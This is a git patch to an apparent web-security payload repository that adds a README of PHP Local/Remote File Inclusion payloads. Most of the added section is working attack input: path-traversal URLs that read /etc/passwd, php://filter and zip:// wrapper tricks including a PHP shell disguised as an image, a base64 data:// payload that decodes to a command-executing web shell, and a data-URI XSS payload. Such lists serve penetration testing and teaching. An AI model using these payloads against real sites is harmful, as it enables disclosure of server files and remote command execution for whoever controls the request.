From 8317ae4a607463a93e5b942e5af6ca477214f357 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Thu, 20 Oct 2016 09:39:06 +0700 Subject: [PATCH] PHP Include payloads --- PHP_Include/README.md | 40 ++++++++++++++++++++++++++++++++++++++++ README.md | 5 +++-- 2 files changed, 43 insertions(+), 2 deletions(-) create mode 100644 PHP_Include/README.md diff --git a/PHP_Include/README.md b/PHP_Include/README.md new file mode 100644 index 0000000..2e95014 --- /dev/null +++ b/PHP_Include/README.md @@ -0,0 +1,40 @@ +# Local/Remote File Inclusion +The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. + +## Exploit + +Basic LFI (null byte and double encoding) +``` +http://example.com/index.php?page=etc/passwd +http://example.com/index.php?page=etc/passwd%00 +http://example.com/index.php?page=../../etc/passwd +http://example.com/index.php?page=%252e%252e%252f +``` + +LFI Wrapper rot13 and base64 +``` +php://filter/read=string.rot13/resource= +php://filter/convert.base64-encode/resource= +``` + +LFI Wrapper zip +```python +os.system("echo \"\" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php") + +zip://shell.jpg%23payload.php +``` + + +RFI Wrapper with "" payload +``` +http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= +``` + + +XSS via RFI/LFI with "" payload +``` +data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+ +``` + +## Thanks to +* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion \ No newline at end of file diff --git a/README.md b/README.md index 12ebef6..64eab98 100644 --- a/README.md +++ b/README.md @@ -1,8 +1,7 @@ -# Payloads All The Things +a# Payloads All The Things A list of usefull payloads and bypasses for Web Application Security TODO: -* PHP Include * PHP Serialization * CSV Injection @@ -15,8 +14,10 @@ To improve: * Tar command exec * Traversal Directory * XSS +* PHP Include TODO v2: * Remove "_" in dir name +* Add CVE : Hearbleed and ShellShock ? # /!\ Work in Progress : 40%